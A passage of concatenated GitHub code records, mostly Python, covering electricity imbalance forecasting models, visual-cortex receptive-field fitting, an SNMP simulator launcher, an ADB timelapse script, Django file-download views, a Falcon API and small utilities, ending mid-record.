pd.read_csv('SEF-ML/data/derived_system_wide_data.csv')\nforecast_day_and_day_ahead_demand_data = pd.read_csv('SEF-ML/data/forecast_day_and_day_ahead_demand_data.csv')\ninitial_demand_outturn = pd.read_csv('SEF-ML/data/initial_demand_outturn.csv')\ninterconnectors = pd.read_csv('SEF-ML/data/interconnectors.csv')\nloss_of_load_probability = pd.read_csv('SEF-ML/data/loss_of_load_probability.csv')\nmarket_index_data = pd.read_csv('SEF-ML/data/market_index_data.csv')\nwind_generation_forecast_and_outturn = pd.read_csv('SEF-ML/data/wind_generation_forecast_and_outturn.csv')\nrenewable_generation_forecast = pd.read_csv('SEF-ML/data/day_ahead_generation_forecast_wind_and_solar.csv')\nforecast_demand = pd.read_csv('SEF-ML/data/forecast_day_and_day_ahead_demand_data.csv')\n\n# set the index of each data frame to begin at 0\ngeneration_per_type.set_index('Unnamed: 0', inplace=True)\napx_price.set_index('Unnamed: 0', inplace=True)\ngeneration_day_ahead.set_index('Unnamed: 0', inplace=True)\nderived_system_wide_data.set_index('Unnamed: 0', inplace=True)\nforecast_day_and_day_ahead_demand_data.set_index('Unnamed: 0', inplace=True)\ninitial_demand_outturn.set_index('Unnamed: 0', inplace=True)\ninterconnectors.set_index('Unnamed: 0', inplace=True)\nloss_of_load_probability.set_index('Unnamed: 0', inplace=True)\nmarket_index_data.set_index('Unnamed: 0', inplace=True)\nwind_generation_forecast_and_outturn.set_index('Unnamed: 0', inplace=True)\nrenewable_generation_forecast.set_index('Unnamed: 0', inplace=True)\nforecast_demand.set_index('Unnamed: 0', inplace=True)\n\n# sort each data from in order\ngeneration_per_type.sort_index(inplace=True)\napx_price.sort_index(inplace=True)\nrenewable_generation_forecast.sort_index(inplace=True)\nforecast_demand.sort_index(inplace=True)\ngeneration_day_ahead.sort_index(inplace=True)\nderived_system_wide_data.sort_index(inplace=True)\nforecast_day_and_day_ahead_demand_data.sort_index(inplace=True)\ninitial_demand_outturn.sort_index(inplace=True)\ninterconnectors.sort_index(inplace=True)\nloss_of_load_probability.sort_index(inplace=True)\nmarket_index_data.sort_index(inplace=True)\nwind_generation_forecast_and_outturn.sort_index(inplace=True)\n\n# ---------------------------------------------------------------------\n# Data Pre-processing\n# function to sum columns\nraw_data = pd.concat([generation_per_type, apx_price, renewable_generation_forecast, forecast_demand,\n generation_day_ahead, derived_system_wide_data, forecast_day_and_day_ahead_demand_data,\n initial_demand_outturn, interconnectors, loss_of_load_probability,\n market_index_data, wind_generation_forecast_and_outturn], axis=1, sort=True)\n\n\ndef preprocess_features(raw_data):\n \"\"\"Prepares input features from California housing data set.\n\n Args:\n whole_dataframe: A Pandas DataFrame expected to contain data\n from the the \"df\".\n Returns:\n A DataFrame that contains the features to be used for the model, including\n synthetic features.\n \"\"\"\n\n # Create a copy of the raw data and then drop all duplicates and label data.\n processed_features = raw_data.copy()\n processed_features = processed_features.loc[:, ~processed_features.columns.duplicated()]\n\n # Drop unwanted data or fill if applicable\n indexNames = processed_features[processed_features['quantity'] < 10000].index\n processed_features.drop(indexNames, inplace=True)\n processed_features.drop(\"intnemGeneration\", axis=1, inplace=True)\n processed_features.drop('settlementDate', axis=1, inplace=True)\n processed_features.drop('systemSellPrice', axis=1, inplace=True)\n processed_features.drop('sellPriceAdjustment', axis=1, inplace=True)\n processed_features.drop('FossilOil', axis=1, inplace=True)\n processed_features['initialWindForecast'].fillna(method='ffill', inplace=True)\n processed_features['latestWindForecast'].fillna(method='ffill', inplace=True)\n processed_features['reserveScarcityPrice'].fillna(0, inplace=True)\n processed_features['drm2HourForecast'].fillna(processed_features['drm2HourForecast'].mean(), inplace=True)\n processed_features['lolp1HourForecast'].fillna(0, inplace=True)\n processed_features.dropna(inplace=True)\n\n\n\n # Separate targets and features.\n processed_target = processed_features['indicativeNetImbalanceVolume'].copy()\n\n # Create a synthetic features.\n processed_features.loc[:, 'RenewablePrediction'] = (processed_features.loc[:, 'solar'] +\n processed_features.loc[:, 'wind_off'] +\n renewable_generation_forecast.loc[:, 'wind_on'])\n processed_features['Val_Diff'] = processed_features['initialWindForecast'] \\\n - processed_features['latestWindForecast']\n processed_features['Solar_Frac'] = processed_features['solar'] / processed_features['quantity']\n processed_features['Wind_Frac'] = (processed_features['wind_off'] + processed_features['wind_on'])\\\n / processed_features['quantity']\n processed_features['Renewable_Frac'] = processed_features['RenewablePrediction'] / processed_features['quantity']\n processed_features.indicativeNetImbalanceVolume = processed_features.indicativeNetImbalanceVolume.shift(2)\n processed_features.indicativeNetImbalanceVolume = processed_features.indicativeNetImbalanceVolume.fillna(0)\n\n # Rename columns\n processed_target = processed_target.rename(\"NIV\")\n processed_features.rename({'quantity': 'Generation', 'systemBuyPrice': 'ImbalancePrice',\n 'indicativeNetImbalanceVolume': 'Shift_NIV'}, axis='columns', inplace=True)\n\n return processed_features, processed_target\n\n\ndef log_normalize(series):\n return series.apply(lambda x: np.log(x+1.0))\n\n\ndef clip(series, clip_to_min, clip_to_max):\n return series.apply(lambda x: (min(max(x, clip_to_min), clip_to_max)))\n\n\n[processed_features, processed_targets] = preprocess_features(raw_data)\nprocessed_features_copy = processed_features.copy()\n\nprocessed_features['APXPrice'] = clip(processed_features['APXPrice'], 0, 200)\nprocessed_features['Biomass'] = clip(processed_features['Biomass'], 0, 4000)\nprocessed_features['Nuclear'] = clip(processed_features['Nuclear'], 4000, 10000)\nprocessed_features['OffWind'] = clip(processed_features['OffWind'], 0, 5000)\nprocessed_features['OffWind'] = clip(processed_features['OffWind'], 0, 11000)\nprocessed_features['ImbalancePrice'] = clip(processed_features['ImbalancePrice'], -100, 250)\n\nprocessed_features['FossilHardCoal'] = log_normalize(processed_features['FossilHardCoal'])\nprocessed_features['HydroPumpedStorage'] = log_normalize(processed_features['HydroPumpedStorage'])\nprocessed_features['HydroRunOfRiver'] = log_normalize(processed_features['HydroRunOfRiver'])\nprocessed_features['solar'] = log_normalize(processed_features['solar'])\nprocessed_features['Other'] = log_normalize(processed_features['Other'])\n\n# ----------------------------------------------------------------------------------------------------------------------\n# calculate the correlation matrix, isolate the NIV correlations and then order by the abs value (descending)\n\nprocessed_features = processed_features.loc[processed_features.index > 2016000000, :]\nprocessed_targets = processed_targets.loc[processed_targets.index > 2016000000]\n\nX_train_all = processed_features.loc[processed_features.index < 2018030000, :]\ny_train = processed_targets.loc[processed_targets.index < 2018030000]\n\nX_validate_all = processed_features.loc[processed_features.index < 2018030000, :]\ny_validate = processed_targets.loc[processed_features.index < 2018030000]\n\n# X_validate_all = processed_features.loc[ 2018030000: 2018090000, :]\n# y_validate = processed_targets.loc[ 2018030000 : 2018090000]\n\n# X_test_all = processed_features.loc[processed_features.index > 2018090000, :]\n# y_test = processed_targets.loc[processed_targets.index > 2018090000]\n\n# Normalize the validation data and separate into X and y variables data frames.\ncols_all = ['ImbalancePrice', 'solar', 'Solar_Frac', 'APXPrice',\n 'Biomass', 'Other', 'wind_off', 'initialWindForecast', 'Wind_Frac', 'Val_Diff', ]\n\nX_train = X_train_all.loc[:, cols_all]\n\nX_train_mean = X_train.mean()\nX_train_std = X_train.std()\nX_train = (X_train - X_train_mean) / X_train_std\n\nX_validate = X_validate_all.loc[:, cols_all]\nX_validate = (X_validate-X_train_mean)/X_train_std\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Training\n# Train each sklearn model\nlin = LinearRegression()\nlin.fit(X_train, y_train)\n\nela = ElasticNet(alpha=0.460)\nela.fit(X_train, y_train)\n\nlass = Lasso(alpha=0.705)\nlass.fit(X_train, y_train)\n\nforest_reg = RandomForestRegressor(n_estimators=400, min_samples_split=2, min_samples_leaf=4, max_features='sqrt',\n max_depth=10, bootstrap=True, random_state=42)\nforest_reg.fit(X_train, y_train)\n\n# Calculate the predictions from each model.\ny_lin_prediction = lin.predict(X_validate)\nlin_mse = mean_squared_error(y_validate, y_lin_prediction)\nlin_rme = np.sqrt(lin_mse)\n\n\ny_ela_prediction = ela.predict(X_validate)\nela_mse = mean_squared_error(y_validate, y_ela_prediction)\nela_rme = np.sqrt(ela_mse)\n\ny_lass_prediction = lass.predict(X_validate)\nlass_mse = mean_squared_error(y_validate, y_lass_prediction)\nlass_rme = np.sqrt(lass_mse)\n\ny_random_forest_prediction = forest_reg.predict(X_validate)\nrandom_forest_mse = mean_squared_error(y_validate, y_random_forest_prediction)\nrandom_forest_rme = np.sqrt(random_forest_mse)\n\n# Static model input for how many periods the data should be shifted and then shift data.\n\n\ndef static_model(data, steps):\n prediction = data.copy()\n prediction = prediction.shift(periods=int(steps))\n return prediction\n\n\n# Periods = input(\"How many settlement periods ahead do you want to predict?: \")\nperiods = 3\nstatic_pred = static_model(y_validate, periods)\n\n# Fill any NaN with 0 and calcualte rme\ny_static_pred = static_pred.fillna(0).values\nstatic_mse = mean_squared_error(y_validate, y_static_pred)\nstatic_rmse = np.sqrt(static_mse)\n\n\n# Cross validation\ndef display_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard deviation:\", scores.std())\n\n\nlin_scores = cross_val_score(lin, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nlin_rmse_scores = np.sqrt(-lin_scores)\nprint(\"Linear Regression Model\")\ndisplay_scores(lin_rmse_scores)\nprint(lin_rme)\n\nlass_scores = cross_val_score(lass, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nlass_rmse_scores = np.sqrt(-lass_scores)\nprint(\"LASSO Model\")\ndisplay_scores(lass_rmse_scores)\nprint(lass_rme)\n\nela_scores = cross_val_score(ela, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nela_rmse_scores = np.sqrt(-ela_scores)\nprint(\"Elastic Net Model\")\ndisplay_scores(ela_rmse_scores)\nprint(ela_rme)\n\nrandom_forest_scores = cross_val_score(forest_reg, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nrandom_forest_rmse_scores = np.sqrt(-random_forest_scores)\nprint(\"Random Forests Model\")\ndisplay_scores(random_forest_rmse_scores)\nprint(random_forest_rme)\n\nprint()\nprint(\"cross validatiion scores\")\nprint(\"Static model RME = \" + str(round(static_rmse, 2)) + 'MWh')\nprint(\"Lasso model RME = \" + str(round(np.mean(lass_rme), 2)) + 'MWh')\nprint(\"Elastic Net model RME = \" + str(round(np.mean(ela_rme), 2)) + 'MWh')\nprint(\"Linear Regression model RME = \" + str(round(np.mean(lin_rme), 2)) + 'MWh')\nprint(\"Random Forest model RME = \" + str(round(np.mean(random_forest_rme), 2)) + 'MWh')\nprint()\nprint(\"==============================================================\")\nprint()\nprint(\"cross validatiion scores\")\nprint(\"Static model RME = \" + str(round(static_mse, 2)) + 'MWh')\nprint(\"Lasso model RME = \" + str(round(np.mean(lass_rmse_scores), 2)) + 'MWh')\nprint(\"Elastic Net model RME = \" + str(round(np.mean(ela_rmse_scores), 2)) + 'MWh')\nprint(\"Linear Regression model RME = \" + str(round(np.mean(lin_rmse_scores), 2)) + 'MWh')\nprint(\"Random Forest model RME = \" + str(round(np.mean(random_forest_rmse_scores), 2)) + 'MWh')\nprint()\n# convert periods to days\ndays = np.arange(len(y_ela_prediction))/48\nmax_days = 10*48\n\n# Plot data on one graph.\nplt.rcParams[\"figure.figsize\"] = (30, 10)\nmodel = [y_static_pred, y_ela_prediction, y_lin_prediction, y_lass_prediction, y_random_forest_prediction, y_validate]\nname = ['Static', 'Elastic Net', 'Linear Regression', 'Lasso', 'Random Forests', 'NIV']\ncolour = ['m', 'b', 'y', 'g', 'c']\n\nfor y_data, c, l in zip(model[:-1], colour, name[:-1]):\n plt.plot(days[:max_days], y_data[:max_days], color=c, linewidth=2, linestyle='solid', label=l)\nplt.plot(days[:max_days], y_validate.values[:max_days], color='k', linewidth=2, linestyle='dashed')\nplt.title('All models: Comparison of First 100 Validation Values')\nplt.xlabel('Days')\nplt.ylabel('NIV')\nplt.legend()\nplt.show()\n\n# Plot data on separate graphs\nfor y_data, l in zip(model, name):\n plt.plot(days[:max_days], y_validate.values[:max_days], color='k', linewidth=2, linestyle='dashed')\n plt.plot(days[:max_days], y_data[:max_days], color='b')\n plt.xlabel('Days')\n plt.ylabel('NIV')\n plt.title(l)\n plt.show()\n","repo_name":"JohnCLong/SEF_ML","sub_path":"initial models/All_models.py","file_name":"All_models.py","file_ext":"py","file_size_in_byte":13915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20597572880","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage import gaussian_filter\r\nfrom scipy.optimize import curve_fit\r\nfrom probes_coord import dim_calculator\r\n\r\n\r\ndef stimulus_averaged_responses(stim, dataset):\r\n \"\"\"Average response to a stimulus\r\n This function calculates the average response to each stimulus. For each \r\n probe location, 96 response values (each for an electrode) are calculated.\r\n \"\"\"\r\n averaged_responses = np.zeros((100, 96))\r\n for i in np.arange(1, 101):\r\n averaged_responses[i - 1, :] = np.mean(dataset[stim == i, :], axis=0)\r\n return averaged_responses\r\n\r\n\r\ndef RF(averaged_responses, electrode):\r\n \"\"\"Electrode receptive field data\r\n This function chooses the mean responses of an electrode to all the probe \r\n locations.\r\n \"\"\"\r\n RF_electrode = averaged_responses[:, electrode]\r\n return RF_electrode\r\n\r\n\r\ndef RF_plotter(RF_electrode, v_min, v_max, filename):\r\n \"\"\"Receptive field Plotter\r\n This function plots receptive field of an electrode\r\n \"\"\"\r\n fig = plt.figure(figsize=(9, 12))\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n RF_electrode = gaussian_filter(RF_electrode, sigma=0.8)\r\n plt.imshow(RF_electrode, interpolation='bilinear', vmin=v_min, vmax=v_max)\r\n plt.xticks(np.array([0, 9]), [-36, 0])\r\n plt.yticks(np.array([0, 9]), [2, -34])\r\n plt.xlabel('Position(deg)', fontsize=40, fontweight='bold')\r\n plt.ylabel('Position(deg)', fontsize=40, fontweight='bold')\r\n plt.subplots_adjust()\r\n cax = plt.axes([1, 0.23, 0.03, 0.1])\r\n plt.colorbar(cax=cax).set_ticks([v_min, v_max])\r\n plt.show()\r\n fig.savefig(filename, dpi=150)\r\n\r\n\r\ndef RF_set_viewer(stim, dataset, electrode_set, v_min, v_max, filename):\r\n \"\"\"Group RF plotter\r\n This function plots receptive fields of a group of electrodes\r\n \"\"\"\r\n fig = plt.figure(figsize=(15, 15))\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n c = 1\r\n for electrode in electrode_set:\r\n RF_electrode = RF(averaged_responses, electrode)\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n RF_electrode = gaussian_filter(RF_electrode, sigma=0.8)\r\n fig.add_subplot(10, 10, c)\r\n plt.imshow(RF_electrode, interpolation='bilinear', vmin=v_min, vmax=v_max)\r\n plt.gca().axes.get_xaxis().set_ticks([])\r\n plt.gca().axes.get_yaxis().set_ticks([])\r\n c = c + 1\r\n plt.show()\r\n fig.savefig(filename, dpi=350)\r\n\r\n\r\ndef tuning_plotter(stim, dataset, electrode, v_min, v_max, filename):\r\n \"\"\"Tuning curve plotter\r\n Plots tuning curve (region) of an electrode\r\n \"\"\"\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n RF_electrode = RF(averaged_responses, electrode)\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n fig = plt.figure(figsize=(5, 5))\r\n plt.imshow(RF_electrode, vmin=v_min, vmax=v_max)\r\n plt.xticks(np.array([0, 9]), [-36, 0])\r\n plt.yticks(np.array([0, 9]), [2, -34])\r\n plt.xlabel('Position(deg)', fontweight='bold')\r\n plt.ylabel('Position(deg)', fontweight='bold')\r\n plt.subplots_adjust()\r\n cax = plt.axes([1, 0.23, 0.03, 0.1])\r\n plt.colorbar(cax=cax).set_ticks([v_min, v_max])\r\n plt.show()\r\n fig.savefig(filename, dpi=150)\r\n\r\n\r\ndef tuning_plotterP3(stim, dataset, electrode, v_min, v_max, filename):\r\n \"\"\"Tuning curve plotter\r\n Plots tuning curve (region) of an electrode\r\n \"\"\"\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n RF_electrode = RF(averaged_responses, electrode)\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n fig = plt.figure(figsize=(5, 5))\r\n plt.imshow(RF_electrode, vmin=v_min, vmax=v_max)\r\n plt.xticks(np.array([0, 9]), [-36 + 20, 0 + 20])\r\n plt.yticks(np.array([0, 9]), [2, -34])\r\n plt.xlabel('Position(deg)', fontweight='bold')\r\n plt.ylabel('Position(deg)', fontweight='bold')\r\n plt.subplots_adjust()\r\n cax = plt.axes([1, 0.23, 0.03, 0.1])\r\n plt.colorbar(cax=cax).set_ticks([v_min, v_max])\r\n plt.show()\r\n fig.savefig(filename, dpi=150)\r\n\r\n\r\ndef two_d_gaussian(x, A, x1_0, x2_0, sigma_x1, sigma_x2, d):\r\n \"\"\"2D Gaussian\r\n 2D Gaussian function that takes x as input and outputs a corresponding \r\n Gaussian value. This will be called by gaussian_RF function.\r\n \"\"\"\r\n return A * np.exp(\r\n -((x[:, 0] - x1_0) ** 2 / (2 * sigma_x1 ** 2)) - ((x[:, 1] - x2_0) ** 2 / (2 * sigma_x2 ** 2))) + d\r\n\r\n\r\ndef gaussian_RF(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2):\r\n \"\"\"\r\n This function fits a 2D Gaussian to the Receptive field of an electrode in \r\n terms of its x-y locations on the grid\r\n \"\"\"\r\n dim = dim_calculator()\r\n popt, pcov = curve_fit(two_d_gaussian, dim, RF_electrode, p0=[1, x1_0, x2_0, sigma_x1, sigma_x2, 0],\r\n bounds=([-2, -36, -34, 2, 2, -2], [3, 0, 2, 30, 30, 2]))\r\n RF_gaussian = two_d_gaussian(dim, *popt)\r\n return RF_gaussian, popt\r\n\r\n\r\ndef gaussian_RF_P3(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2):\r\n \"\"\"\r\n This function fits a 2D Gaussian to the Receptive field of an electrode in \r\n terms of its x-y locations on the grid\r\n \"\"\"\r\n dim = dim_calculator()\r\n popt, pcov = curve_fit(two_d_gaussian, dim, RF_electrode, p0=[1, x1_0, x2_0, sigma_x1, sigma_x2, 0],\r\n bounds=([-2, -36 + 20, -34, 2, 2, -2], [3, 0 + 20, 2, 30, 30, 2]))\r\n RF_gaussian = two_d_gaussian(dim, *popt)\r\n return RF_gaussian, popt\r\n\r\n\r\ndef FWHM_gaussian(param_G):\r\n \"\"\"Gaussian FWHM\r\n This function calculates full width at half maximum (FWHM) of the fitted \r\n Gaussian to a receptive field. It takes as input parameters of the fitted \r\n Gaussian\r\n \"\"\"\r\n X = np.arange(-36, 4, 4)\r\n Y = np.arange(2, -38, -4)\r\n X, Y = np.meshgrid(X, Y)\r\n Z = param_G[0] * np.exp(\r\n -((X - param_G[1]) ** 2 / (2 * param_G[3] ** 2)) - ((Y - param_G[2]) ** 2 / (2 * param_G[4] ** 2))) + param_G[\r\n 5] - (param_G[5] + param_G[0]) / 2\r\n return X, Y, Z\r\n\r\n\r\ndef FWHM_gaussian_P3(param_G):\r\n \"\"\"Gaussian FWHM\r\n This function calculates full width at half maximum (FWHM) of the fitted \r\n Gaussian to a receptive field. It takes as input parameters of the fitted \r\n Gaussian\r\n \"\"\"\r\n X = np.arange(-36 + 20, 4 + 20, 4)\r\n Y = np.arange(2, -38, -4)\r\n X, Y = np.meshgrid(X, Y)\r\n Z = param_G[0] * np.exp(\r\n -((X - param_G[1]) ** 2 / (2 * param_G[3] ** 2)) - ((Y - param_G[2]) ** 2 / (2 * param_G[4] ** 2))) + param_G[\r\n 5] - (param_G[5] + param_G[0]) / 2\r\n return X, Y, Z\r\n\r\n\r\ndef RF_diameter(param_G):\r\n \"\"\"RF diameter\r\n This function takes the parameters of the fitted Gaussian to calculate \r\n diameters of FWHM ellipse\r\n \"\"\"\r\n Dx = 2 * np.abs(param_G[3]) * np.sqrt(-2 * np.log(1 / 2 - (1 / 2) * (param_G[5] / param_G[0])))\r\n Dy = 2 * np.abs(param_G[4]) * np.sqrt(-2 * np.log(1 / 2 - (1 / 2) * (param_G[5] / param_G[0])))\r\n return Dx, Dy\r\n\r\n\r\ndef population_contours(dataset, stim, electrode_set, sigm, clr):\r\n \"\"\"RF contours from a group of electrodes\r\n This function plots fitted FWHM ellipse to receptive fields of a group of \r\n electrodes. In addition, it returns mean RF diameter of all the electrodes \r\n in the electrode_set.\r\n \"\"\"\r\n dim = dim_calculator()\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n RF_mean_diameter = np.zeros(len(electrode_set))\r\n c = 0\r\n for electrode in electrode_set:\r\n RF_electrode = RF(averaged_responses, electrode)\r\n ind = np.argmax(RF_electrode)\r\n x1_0, x2_0, sigma_x1, sigma_x2 = dim[ind, 0], dim[ind, 1], sigm, sigm\r\n RF_G, param_G = gaussian_RF(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2)\r\n X, Y, Z = FWHM_gaussian(param_G)\r\n Dx, Dy = RF_diameter(param_G)\r\n D = 0.5 * (Dx + Dy)\r\n RF_mean_diameter[c] = D\r\n plt.contour(X, Y, Z, [0], colors=clr, linewidths=2)\r\n c = c + 1\r\n plt.xlabel('Position(deg)', fontsize=40, fontweight='bold')\r\n plt.ylabel('Position(deg)', fontsize=40, fontweight='bold')\r\n return RF_mean_diameter\r\n\r\n\r\ndef RFCenterPosition(dataset, stim, electrode_set, sigm):\r\n \"\"\"RF centers\r\n This function determines coordinations of the receptive fields centers \r\n obtained by the fitted Gaussian\r\n \"\"\"\r\n dim = dim_calculator()\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n RF_center_position = np.zeros((len(electrode_set), 2))\r\n c = 0\r\n for electrode in electrode_set:\r\n RF_electrode = RF(averaged_responses, electrode)\r\n ind = np.argmax(RF_electrode)\r\n x1_0, x2_0, sigma_x1, sigma_x2 = dim[ind, 0], dim[ind, 1], sigm, sigm\r\n RF_G, param_G = gaussian_RF(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2)\r\n RF_center_position[c, :] = param_G[1], param_G[2]\r\n c = c + 1\r\n return RF_center_position\r\n\r\n\r\ndef RFCenterEccentricity(RF_center_position):\r\n \"\"\"RF centers eccentricity\r\n This function calculates eccentricity of the receptive fields centers\r\n \"\"\"\r\n RF_center_eccentricity = np.sqrt(RF_center_position[:, 0] ** 2 + RF_center_position[:, 1] ** 2)\r\n return RF_center_eccentricity\r\n\r\n\r\ndef RFDiameterEccentricityPlot(RF_center_eccentricity, RF_mean_diameter, trace_color, figure_title, file_name):\r\n \"\"\"RF diameters vs eccentricity\r\n This function plots the diameter of the receptive fields versus their \r\n center eccentricity\r\n \"\"\"\r\n fig = plt.figure(figsize=(12, 8))\r\n ind = np.argsort(RF_center_eccentricity)\r\n plt.scatter(RF_center_eccentricity[ind], RF_mean_diameter[ind], marker=\"^\", s=200, c=trace_color)\r\n plt.axis('tight')\r\n plt.tight_layout()\r\n plt.ylim(0, 40)\r\n plt.xlim(0, 40)\r\n plt.ylabel('RF Diameter', fontweight='bold')\r\n plt.xlabel('RF Center Eccentricity', fontweight='bold')\r\n plt.title(figure_title, fontweight='bold', loc='center')\r\n plt.show()\r\n fig.savefig(file_name, dpi=350)\r\n\r\n\r\ndef ECConArray(RF_center_eccentricity, electrode_set, plxarray, filename):\r\n \"\"\"Eccentricity plotted on the array\r\n This function plots the eccentricity of each electrode on its location on \r\n the electrode array\r\n \"\"\"\r\n fig = plt.figure(figsize=(9, 12))\r\n Aray_ecc = np.zeros(100)\r\n Aray_ecc[electrode_set] = RF_center_eccentricity\r\n plt.imshow(Aray_ecc[plxarray - 1], vmin=0, vmax=40)\r\n plt.gca().axes.get_xaxis().set_ticks([])\r\n plt.gca().axes.get_yaxis().set_ticks([])\r\n plt.title('RF Eccentricity', fontweight='bold')\r\n plt.subplots_adjust()\r\n cax = plt.axes([1, 0.25, 0.05, 0.2])\r\n plt.colorbar(cax=cax).set_ticks([0, 40]) # rect = [left, bottom, width, height]\r\n plt.show()\r\n fig.savefig(filename, dpi=350)\r\n","repo_name":"Armin12/Decoding-Population-Activity-in-V4","sub_path":"RF_calc.py","file_name":"RF_calc.py","file_ext":"py","file_size_in_byte":10759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13160325437","text":"import sys\nimport subprocess\n\nfrom optparse import OptionParser\nfrom snmposter import SNMPosterFactory\n\n\ndef launcher():\n \"\"\"Launch it.\"\"\"\n parser = OptionParser()\n parser.add_option(\n '-f',\n '--file',\n dest='filename',\n default='agents.csv',\n help='snmposter configuration file'\n )\n options, args = parser.parse_args()\n\n factory = SNMPosterFactory()\n\n snmpd_status = subprocess.Popen(\n [\"service\", \"snmpd\", \"status\"],\n stdout=subprocess.PIPE\n ).communicate()[0]\n\n if \"is running\" in snmpd_status:\n message = \"snmd service is running. Please stop it and try again.\"\n print >> sys.stderr, message\n sys.exit(1)\n\n try:\n factory.configure(options.filename)\n except IOError:\n print >> sys.stderr, \"Error opening %s.\" % options.filename\n sys.exit(1)\n\n factory.start()\n","repo_name":"cluther/snmposter","sub_path":"snmposter/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"32"} +{"seq_id":"19963728087","text":"import time\n\nfrom ppadb.client import Client as AdbClient\n\n\ndelay_between_takes = 3 # in seconds\ntotal_amount_of_takes = 10\nshutter_speed = 10 #in seconds\n\n\ndef connect():\n client = AdbClient(host=\"127.0.0.1\", port=5037)\n\n devices = client.devices()\n\n if len(devices) == 0:\n print('No devices')\n quit()\n\n device = devices[0]\n\n print(f'Connected to {device}')\n\n return device, client\n\nif __name__ == '__main__':\n device, client = connect()\n\n for i in range(total_amount_of_takes):\n device.shell('input keyevent 25')\n time.sleep(shutter_speed+delay_between_takes)\n","repo_name":"uvsq21705818/adbtimelapse","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71240106009","text":"import io\nimport os\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import StreamingHttpResponse, HttpResponse\nfrom django.views import View\nfrom django.views.generic import ListView, DetailView\n\nfrom .models import MapResult, RenderJob\n\n\nclass DownloaderView(LoginRequiredMixin, View):\n\n @staticmethod\n def get(request, *args, **kwargs):\n map_result = MapResult.objects.by_guid(kwargs[\"pk\"])\n if map_result is None:\n return HttpResponse(403)\n render_job = RenderJob.objects.get(guid=map_result.job.guid)\n if render_job.owner != request.user:\n return HttpResponse(403)\n url = f\"files/{map_result.file}\"\n filename = os.path.basename(url)\n bf = io.open(url, \"rb\")\n response = StreamingHttpResponse(streaming_content=bf)\n response[\"Content-Disposition\"] = f'attachment; filename=\"{filename}\"'\n return response\n\n\nclass FileListView(LoginRequiredMixin, ListView):\n model = MapResult\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n MapResult.objects.delete_invalid()\n\n def get_queryset(self):\n render_jobs = RenderJob.objects.by_owner(self.request.user)\n return MapResult.objects.by_job(render_jobs)\n\n\nclass JobDetailView(LoginRequiredMixin, DetailView):\n model = RenderJob\n","repo_name":"zigellsn/TerritoriumMapServerFrontend","sub_path":"fileserver/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40895911878","text":"#!/usr/bin/python3\n\nimport json\nimport falcon\nfrom database import Database\n\nclass Country(object):\n\n def on_get(self, req, resp, country):\n\n db = Database()\n\n country_details = db.fetch('countries', 'name', country)\n\n resp.body = json.dumps(country_details)\n\n resp.content_type = 'application/json'\n\n resp.status = falcon.HTTP_200\n\nclass Countries(object):\n\n def on_get(self, req, resp):\n\n db = Database()\n\n countries_data = db.fetchall('countries')\n\n country_data = []\n\n for country in countries_data:\n\n country_record = dict()\n\n country_record['name'] = country['name']\n\n country_record['code'] = country['code']\n\n country_data.append(country_record)\n\n resp.body = json.dumps(country_data)\n\n resp.content_type = 'application/json'\n\n resp.status = falcon.HTTP_200\n","repo_name":"csmets/travel-wish-list","sub_path":"api/countries.py","file_name":"countries.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33838072882","text":"def multiply(num1: str, num2: str) -> str:\n l1, l2 = len(num1), len(num2)\n i, j, ans = 1, 1, 0\n while i < l1 + 1 and j < l2 + 1:\n ans += int(num1[-i]) * int(num2[-j]) * 10 ** (i + j - 2)\n print(i, j, ans)\n i += 1\n if i > l1:\n i = 1\n j += 1\n return str(ans)\n\n\n#print(multiply(\"2\", \"3\"))\nprint(multiply(num1 = \"123\", num2 = \"456\"))","repo_name":"Wilrinator/Leetcode","sub_path":"0043Multiply Strings.py","file_name":"0043Multiply Strings.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41985068667","text":"import pyfirmata\nimport time\nimport pyautogui\n\nboard = pyfirmata.Arduino('COM3')\n\nit = pyfirmata.util.Iterator(board)\nit.start()\n\nboard.digital[7].mode = pyfirmata.INPUT\nboard.digital[8].mode = pyfirmata.INPUT\n\n\nwhile True:\n red = board.digital[7].read()\n blue = board.digital[8].read()\n if red:\n pyautogui.hotkey('ctrl', 'c')\n if blue:\n pyautogui.hotkey('ctrl', 'v')\n 